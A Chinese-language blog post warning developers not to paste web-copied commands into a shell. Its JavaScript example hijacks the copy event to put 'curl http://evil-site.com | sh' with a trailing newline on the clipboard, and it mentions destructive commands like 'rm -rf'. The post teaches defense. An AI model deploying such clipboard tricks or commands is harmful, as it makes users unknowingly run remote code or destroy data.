千万不要往 Shell 里粘贴命令!

用户头像
大道至简
关注
发布于: 2020 年 10 月 22 日
千万不要往 Shell 里粘贴命令!

对于用惯了 IDE 的程序员来说,在终端里敲命令可能没那么顺手,也记不住那么多复杂的命令。比较偷懒的做法就是网上搜相关的命令,复制到剪贴板往命令行窗口里一贴,完事!



但是这么做有很大的风险,为什么呢?



网页里复制的东西,可能并不是你看到的内容。请看大屏幕:

<div class="copyme">$ echo "伪装成普通命令"</div>



document.getElementById('copyme').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain',
'curl http://evil-site.com | sh \n' // 复制了真实命令
);
e.preventDefault();
});



看到了吧,利用 DOM 的copy事件,可以往剪贴板里放自定义内容。有人可能会说复制了命令我还没回车,不会执行呀!图样图森破,尾巴上带个换行符\n,回车都为你代劳了!



这要是复制上了一些危险的命令,比如rm -rfmv folder /dev/null 之类的,执行后就爽歪歪了。



所以,为了安全,不要随便往 shell 里粘贴命令。如果一定要复制粘贴,看清楚剪贴板里的内容再执行!



首发于微信公众号:https://mp.weixin.qq.com/s/WmhnYU7z2c1wBF0l9uNiuA



发布于: 2020 年 10 月 22 日 阅读数: 8
用户头像

大道至简

关注

1024译站站长 2018.10.19 加入

会写代码的伪文青

评论

发布
暂无评论
千万不要往 Shell 里粘贴命令!